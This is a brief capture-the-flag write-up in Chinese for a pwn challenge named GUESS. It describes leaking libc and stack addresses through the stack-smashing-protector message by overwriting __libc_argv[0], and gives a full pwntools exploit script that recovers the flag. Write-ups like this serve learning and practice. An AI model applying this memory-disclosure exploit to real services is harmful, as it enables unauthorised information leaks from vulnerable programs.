3次覆蓋__libc_argv[0]然後泄露出put的真實地址然偶clac出libc然後泄露出environ裏面存的棧地址然後計算flag在棧上的偏移再次泄露即可
exp:
from pwn import *
from LibcSearcher import *
p=process('./GUESS')
elf=ELF('./GUESS')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
gdb.attach(p)
p.recvuntil('flag')
#debug()
payload='a'*296+p64(elf.got['puts'])
p.sendline(payload)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('put_addr: '+hex(put_addr))
#libc=LibcSearcher('puts',put_addr)
libcbase=put_addr-libc.symbols['puts']
envm=libcbase+libc.symbols['_environ']
log.success('envm: '+hex(envm))
p.recvuntil('flag')
payload='a'*296+p64(envm)
p.sendline(payload)
p.recvuntil('*** stack smashing detected ***:')
stack_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('stack_addr: '+hex(stack_addr))
p.recvuntil('flag')
payload='a'*296+p64(stack_addr-360)
p.sendline(payload)
p.interactive()
調試似乎出了點問題子進程的問題??(大師傅可以忽略)